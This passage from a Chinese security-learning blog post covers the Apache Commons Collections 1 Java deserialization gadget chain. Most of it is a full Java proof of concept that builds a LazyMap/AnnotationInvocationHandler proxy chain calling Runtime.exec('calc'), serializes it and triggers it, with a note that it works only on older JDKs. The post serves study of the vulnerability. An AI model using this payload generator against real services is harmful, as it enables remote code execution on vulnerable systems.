<figure class="highlight java"><table><tr><td class="gutter"><pre><span class="line">1</span><br/><span class="line">2</span><br/><span class="line">3</span><br/><span class="line">4</span><br/><span class="line">5</span><br/><span class="line">6</span><br/><span class="line">7</span><br/><span class="line">8</span><br/><span class="line">9</span><br/><span class="line">10</span><br/><span class="line">11</span><br/><span class="line">12</span><br/><span class="line">13</span><br/><span class="line">14</span><br/><span class="line">15</span><br/><span class="line">16</span><br/><span class="line">17</span><br/><span class="line">18</span><br/><span class="line">19</span><br/><span class="line">20</span><br/><span class="line">21</span><br/><span class="line">22</span><br/><span class="line">23</span><br/><span class="line">24</span><br/><span class="line">25</span><br/><span class="line">26</span><br/><span class="line">27</span><br/><span class="line">28</span><br/><span class="line">29</span><br/><span class="line">30</span><br/><span class="line">31</span><br/><span class="line">32</span><br/><span class="line">33</span><br/><span class="line">34</span><br/><span class="line">35</span><br/><span class="line">36</span><br/><span class="line">37</span><br/><span class="line">38</span><br/><span class="line">39</span><br/><span class="line">40</span><br/><span class="line">41</span><br/><span class="line">42</span><br/><span class="line">43</span><br/><span class="line">44</span><br/><span class="line">45</span><br/><span class="line">46</span><br/><span class="line">47</span><br/><span class="line">48</span><br/><span class="line">49</span><br/><span class="line">50</span><br/><span class="line">51</span><br/><span class="line">52</span><br/><span class="line">53</span><br/><span class="line">54</span><br/><span class="line">55</span><br/><span class="line">56</span><br/><span class="line">57</span><br/><span class="line">58</span><br/><span class="line">59</span><br/><span class="line">60</span><br/><span class="line">61</span><br/></pre></td><td class="code"><pre><span class="line"><span class="keyword">package</span> com.example.demo.aaaa;</span><br/><span class="line"></span><br/><span class="line"><span class="keyword">import</span> org.apache.commons.collections.Transformer;</span><br/><span class="line"><span class="keyword">import</span> org.apache.commons.collections.functors.ChainedTransformer;</span><br/><span class="line"><span class="keyword">import</span> org.apache.commons.collections.functors.ConstantTransformer;</span><br/><span class="line"><span class="keyword">import</span> org.apache.commons.collections.functors.InvokerTransformer;</span><br/><span class="line"><span class="keyword">import</span> org.apache.commons.collections.map.LazyMap;</span><br/><span class="line"><span class="keyword">import</span> org.apache.commons.collections.map.TransformedMap;</span><br/><span class="line"></span><br/><span class="line"></span><br/><span class="line"><span class="keyword">import</span> java.lang.annotation.Target;</span><br/><span class="line"><span class="keyword">import</span> java.lang.reflect.Constructor;</span><br/><span class="line"><span class="keyword">import</span> java.lang.reflect.InvocationHandler;</span><br/><span class="line"><span class="keyword">import</span> java.lang.reflect.InvocationTargetException;</span><br/><span class="line"><span class="keyword">import</span> java.lang.reflect.Proxy;</span><br/><span class="line"><span class="keyword">import</span> java.util.HashMap;</span><br/><span class="line"><span class="keyword">import</span> java.util.Map;</span><br/><span class="line"></span><br/><span class="line"><span class="keyword">public</span> <span class="class"><span class="keyword">class</span> <span class="title">Test</span> </span>{</span><br/><span class="line">    <span class="keyword">public</span> <span class="keyword">static</span> HashMap&lt;Integer, String&gt; hashMap = <span class="keyword">new</span> HashMap&lt;&gt;();</span><br/><span class="line"></span><br/><span class="line"></span><br/><span class="line">    <span class="function"><span class="keyword">public</span> <span class="keyword">static</span> <span class="keyword">void</span> <span class="title">main</span><span class="params">(String[] args)</span> <span class="keyword">throws</span> Exception </span>{</span><br/><span class="line"><span class="comment">//        hashMap.put(1, "a");</span></span><br/><span class="line"><span class="comment">//        System.out.println("初始化map:" + hashMap);</span></span><br/><span class="line">        <span class="comment">//Map map = TransformedMap.decorate(hashMap, keyTransformer, valueTransformer);</span></span><br/><span class="line">        <span class="comment">//map.put(2, "b");</span></span><br/><span class="line"><span class="comment">//        Transformer transformer = new InvokerTransformer("exec", new Class[]{String.class}, new Object[]{"calc"});</span></span><br/><span class="line"><span class="comment">//        transformer.transform(Runtime.getRuntime());</span></span><br/><span class="line"><span class="comment">//        Map map = TransformedMap.decorate(hashMap, transformer, valueTransformer);</span></span><br/><span class="line"><span class="comment">//        map.put(Runtime.getRuntime(),"b");</span></span><br/><span class="line">        ChainedTransformer chain = <span class="keyword">new</span> ChainedTransformer(<span class="keyword">new</span> Transformer[]{</span><br/><span class="line">                <span class="keyword">new</span> ConstantTransformer(Runtime.class),</span><br/><span class="line">                <span class="keyword">new</span> InvokerTransformer(<span class="string">"getMethod"</span>, <span class="keyword">new</span> Class[]{String.class, Class[].class}, <span class="keyword">new</span> Object[]{<span class="string">"getRuntime"</span>, <span class="keyword">null</span>}),</span><br/><span class="line">                <span class="keyword">new</span> InvokerTransformer(<span class="string">"invoke"</span>, <span class="keyword">new</span> Class[]{Object.class, Object[].class}, <span class="keyword">new</span> Object[]{<span class="keyword">null</span>, <span class="keyword">null</span>}),</span><br/><span class="line">                <span class="keyword">new</span> InvokerTransformer(<span class="string">"exec"</span>, <span class="keyword">new</span> Class[]{String.class}, <span class="keyword">new</span> Object[]{<span class="string">"calc"</span>})</span><br/><span class="line">        });</span><br/><span class="line"></span><br/><span class="line"></span><br/><span class="line">        Map inmap = <span class="keyword">new</span> HashMap();</span><br/><span class="line">        <span class="comment">// 这里 key 一定是 下面实例化 AnnotationInvocationHandler 时传入的注解类中存在的属性值</span></span><br/><span class="line">        <span class="comment">// 并且这里的值的一定不是属性值的类型</span></span><br/><span class="line">        inmap.put(<span class="string">"value"</span>,<span class="string">"asd"</span>);<span class="comment">//这里value是下面传进的Target中有的属性所以可以触发</span></span><br/><span class="line">        Map outmap = LazyMap.decorate(inmap,chain);</span><br/><span class="line">        Class anno = Class.forName(<span class="string">"sun.reflect.annotation.AnnotationInvocationHandler"</span>);<span class="comment">//反射调用</span></span><br/><span class="line">        Constructor ctor = anno.getDeclaredConstructor(Class.class,Map.class);</span><br/><span class="line">        ctor.setAccessible(<span class="keyword">true</span>);</span><br/><span class="line">        <span class="comment">// 创建携带着 LazyMap 的 AnnotationInvocationHandler 实例</span></span><br/><span class="line">        InvocationHandler handle = (InvocationHandler)ctor.newInstance(Target.class,outmap);</span><br/><span class="line">        <span class="comment">// 创建LazyMap的动态代理类实例</span></span><br/><span class="line">        Map mapproxy = (Map) Proxy.newProxyInstance(LazyMap.class.getClassLoader(),LazyMap.class.getInterfaces(),handle);</span><br/><span class="line">        <span class="comment">// 使用动态代理初始化 AnnotationInvocationHandler</span></span><br/><span class="line">        InvocationHandler instance = (InvocationHandler)ctor.newInstance(Target.class,mapproxy);</span><br/><span class="line">        <span class="comment">//Object instance = ctor.newInstance(Target.class,outmap);//调用构造器生成我们的恶意类</span></span><br/><span class="line">        String b = Tools.base64Encode(Tools.serialize(instance));</span><br/><span class="line">        System.out.println(b);</span><br/><span class="line">        Tools.deserialize(Tools.base64Decode(b));</span><br/><span class="line"></span><br/><span class="line">    }</span><br/><span class="line">}</span><br/><span class="line"></span><br/></pre></td></tr></table></figure>
<p>这里我们就用2个不同的类完成了这条链</p>
<p>这里解释一下，这里2种方式都只能在低版本的jdk触发，前面一种已经解释，lazymap的是因为修改了后改成了新建一个LinkedHashMap，把值转进这个LinkedHashMap里面。在invoke方法中的memberValues并不可控了，所以无法触发。</p>
<h3 id="参考资料">参考资料</h3><p><a href="https://xz.aliyun.com/t/7031" rel="noopener" target="_blank">https://xz.aliyun.com/t/7031</a></p>
<p><a href="https://su18.org/post/ysoserial-su18-2/#commonscollections1" rel="noopener" target="_blank">https://su18.org/post/ysoserial-su18-2/#commonscollections1</a></p>
<p><a href="https://mp.weixin.qq.com/s/gZbcdS0TbAetZwVMyjkGWQ" rel="noopener" target="_blank">https://mp.weixin.qq.com/s/gZbcdS0TbAetZwVMyjkGWQ</a></p>
<p>Java安全漫谈</p>

                
              </div>
            
            <hr/>
            <div>
              <div class="post-metas my-3">
  
  
    <div class="post-meta">
      <i class="iconfont icon-tags"></i>
      
        <a href="/tags/CTF/" class="print-no-link">#CTF</a>
      
        <a href="/tags/Web/" class="print-no-link">#Web</a>
      
        <a href="/tags/X1cT34m/" class="print-no-link">#X1cT34m</a>
      
        <a href="/tags/NJUPT/" class="print-no-link">#NJUPT</a>
      
    </div>
  
</div>


              

              
                <div class="post-prevnext my-3">
                  <article class="post-prev col-6">
                    
                    
                      <a href="/2021/12/09/cc-learn2/" title="cc链学习记录2">
                        <i class="iconfont icon-arrowleft"></i>
                        <span class="hidden-mobile">cc链学习记录2</span>
                        <span class="visible-mobile">上一篇</span>
                      </a>
                    
                  </article>
                  <article class="post-next col-6">
                    
                    
                      <a href="/2021/12/05/cndv/" title="记自己的第一个漏洞">
                        <span class="hidden-mobile">记自己的第一个漏洞</span>
                        <span class="visible-mobile">下一篇</span>
                        <i class="iconfont icon-arrowright"></i>
                      </a>
                    
                  </article>
                </div>
              
            </div>

            
          </article>
        </div>
      </div>
    </div>

    <div class="side-col d-none d-lg-block col-lg-2">
      
  <aside class="sidebar" style="margin-left: -1rem">
    <div id="toc">
  <p class="toc-header">
    <i class="iconfont icon-list"></i>
    <span>目录</span>
  </p>
  <div class="toc-body" id="toc-body"></div>
</div>



  </aside>


    </div>
  </div>
</div>





  



  



  



  



  







    

    
      <a id="scroll-top-button" aria-label="TOP" href="#" role="button">
        <i class="iconfont icon-arrowup" aria-hidden="true"></i>
      </a>
    

    
      <div class="modal fade" id="modalSearch" tabindex="-1" role="dialog" aria-labelledby="ModalLabel"
     aria-hidden="true">
  <div class="modal-dialog modal-dialog-scrollable modal-lg" role="document">
    <div class="modal-content">
      <div class="modal-header text-center">
        <h4 class="modal-title w-100 font-weight-bold">搜索</h4>
        <button type="button" id="local-search-close" class="close" data-dismiss="modal" aria-label="Close">
          <span aria-hidden="true">&times;</span>
        </button>
      </div>
      <div class="modal-body mx-3">
        <div class="md-form mb-5">
          <input type="text" id="local-search-input" class="form-control validate">
          <label data-error="x" data-success="v" for="local-search-input">关键词</label>
        </div>
        <div class="list-group" id="local-search-result"></div>
      </div>
    </div>
  </div>
</div>

    

    
  </main>

  <footer>
    <div class="footer-inner">
  
    <div class="footer-content">
       <span>© Pupi1</span> <span class="mx-1">|</span> <span>Built with Hexo and Fluid</span> 
    </div>
  
  
  
</div>

  </footer>

  <!-- Scripts -->
  
  <script  src="https://lib.baomitu.com/nprogress/0.2.0/nprogress.min.js" ></script>
  <link  rel="stylesheet" href="https://lib.baomitu.com/nprogress/0.2.0/nprogress.min.css" />

  <script>
    NProgress.configure({"showSpinner":false,"trickleSpeed":100})
    NProgress.start()
    window.addEventListener('load', function() {
      NProgress.done();
    })
  </script>


<script  src="https://lib.baomitu.com/jquery/3.6.4/jquery.min.js" ></script>
<script  src="https://lib.baomitu.com/twitter-bootstrap/4.6.1/js/bootstrap.min.js" ></script>
<script  src="/js/events.js" ></script>
<script  src="/js/plugins.js" ></script>


  <script  src="https://lib.baomitu.com/typed.js/2.0.12/typed.min.js" ></script>
  <script>
    (function (window, document) {
      var typing = Fluid.plugins.typing;
      var subtitle = document.getElementById('subtitle');
      if (!subtitle || !typing) {
        return;
      }
      var text = subtitle.getAttribute('data-typed-text');
      
        typing(text);
      
    })(window, document);
  </script>




  
    <script  src="/js/img-lazyload.js" ></script>
  




  
<script>
  Fluid.utils.createScript('https://lib.baomitu.com/tocbot/4.20.1/tocbot.min.js', function() {
    var toc = jQuery('#toc');
    if (toc.length === 0 || !window.tocbot) { return; }
    var boardCtn = jQuery('#board-ctn');
    var boardTop = boardCtn.offset().top;

    function isExpandAllEnabled() {
      return CONFIG.toc && CONFIG.toc.expand_all === true;
    }
    function expandAllToc() {
      if (!isExpandAllEnabled()) { return; }
      jQuery('#toc-body .tocbot-is-collapsed').removeClass('tocbot-is-collapsed');
    }
    function updateTocToggle($li, $childList) {
      var $toggle = $li.children('.toc-toggle');
      if ($toggle.length === 0) { return; }
      var collapsed = $childList.hasClass('tocbot-is-collapsed');
      $toggle
        .toggleClass('toc-toggle-collapsed', collapsed)
        .toggleClass('toc-toggle-expanded', !collapsed);
    }
    function bindTocToggle() {
      if (!isExpandAllEnabled()) { return; }
      jQuery('#toc-body .toc-list-item').each(function() {
        var $li = jQuery(this);
        var $childList = $li.children('ol');
        if ($childList.length === 0) {
          if ($li.children('.toc-toggle').length === 0) {
            $li.prepend('<span class="toc-toggle toc-toggle-placeholder" aria-hidden="true">›</span>');
          }
          return;
        }

        if ($li.children('.toc-toggle').length === 0) {
          $li.prepend('<span class="toc-toggle toc-toggle-expanded" aria-hidden="true">›</span>');
        }
        updateTocToggle($li, $childList);
      });
      jQuery('#toc-body').off('click.tocToggle').on('click.tocToggle', '.toc-toggle', function(e) {
        e.preventDefault();
        e.stopPropagation();
        var $li = jQuery(this).parent('.toc-list-item');
        var $childList = $li.children('ol');
        if ($childList.length === 0) { return; }
        $childList.toggleClass('tocbot-is-collapsed');
        updateTocToggle($li, $childList);
      });
      if (!window.__tocToggleObserver) {
        window.__tocToggleObserver = new MutationObserver(function(mutations) {
          mutations.forEach(function(mutation) {
            if (mutation.type !== 'attributes' || mutation.attributeName !== 'class') { return; }
            var $list = jQuery(mutation.target);
            var $li = $list.parent('.toc-list-item');
            if ($li.length === 0) { return; }
            updateTocToggle($li, $list);
          });
        });
        jQuery('#toc-body ol').each(function() {
          window.__tocToggleObserver.observe(this, { attributes: true });
        });
      }
    }
    var tocConfig = Object.assign({
      tocSelector     : '#toc-body',
      contentSelector : '.markdown-body',
      linkClass       : 'tocbot-link',
      activeLinkClass : 'tocbot-active-link',
      listClass       : 'tocbot-list',
      isCollapsedClass: 'tocbot-is-collapsed',
      collapsibleClass: 'tocbot-is-collapsible',
      scrollSmooth    : true,
      includeTitleTags: true,
      headingsOffset  : -boardTop,
    }, CONFIG.toc);
    if (isExpandAllEnabled()) {
      tocConfig.collapseDepth = 6;
    }
    window.tocbot.init(tocConfig);
    if (toc.find('.toc-list-item').length > 0) {
      toc.css('visibility', 'visible');
    }
    expandAllToc();
    bindTocToggle();

    Fluid.events.registerRefreshCallback(function() {
      if ('tocbot' in window) {
        tocbot.refresh();
        var toc = jQuery('#toc');
        if (toc.length === 0 || !tocbot) {
          return;
        }
        if (toc.find('.toc-list-item').length > 0) {
          toc.css('visibility', 'visible');
        }
        expandAllToc();
        bindTocToggle();
      }
    });
  });
</script>


  <script src=https://lib.baomitu.com/clipboard.js/2.0.11/clipboard.min.js></script>

  <script>Fluid.plugins.codeWidget();</script>


  
<script>
  Fluid.utils.createScript('https://lib.baomitu.com/anchor-js/5.0.0/anchor.min.js', function() {
    window.anchors.options = {
      placement: CONFIG.anchorjs.placement,
      visible  : CONFIG.anchorjs.visible
    };
    if (CONFIG.anchorjs.icon) {
      window.anchors.options.icon = CONFIG.anchorjs.icon;
    }
    var el = (CONFIG.anchorjs.element || 'h1,h2,h3,h4,h5,h6').split(',');
    var res = [];
    for (var item of el) {
      res.push('.markdown-body > ' + item.trim());
    }
    if (CONFIG.anchorjs.placement === 'left') {
      window.anchors.options.class = 'anchorjs-link-left';
    }
    window.anchors.add(res.join(', '));

    Fluid.events.registerRefreshCallback(function() {
      if ('anchors' in window) {
        anchors.removeAll();
        var el = (CONFIG.anchorjs.element || 'h1,h2,h3,h4,h5,h6').split(',');
        var res = [];
        for (var item of el) {
          res.push('.markdown-body > ' + item.trim());
        }
        if (CONFIG.anchorjs.placement === 'left') {
          anchors.options.class = 'anchorjs-link-left';
        }
        anchors.add(res.join(', '));
      }
    });
  });
</script>


  
<script>
  Fluid.utils.createScript('https://lib.baomitu.com/fancybox/3.5.7/jquery.fancybox.min.js', function() {
    Fluid.plugins.fancyBox();
  });
</script>


  <script>Fluid.plugins.imageCaption();</script>

  <script  src="/js/local-search.js" ></script>





<!-- 主题的启动项，将它保持在最底部 -->
<!-- the boot of the theme, keep it at the bottom -->
<script  src="/js/boot.js" ></script>


  

  <noscript>
    <div class="noscript-warning">博客在允许 JavaScript 运行的环境下浏览效果更佳</div>
  </noscript>
</body>
</html>
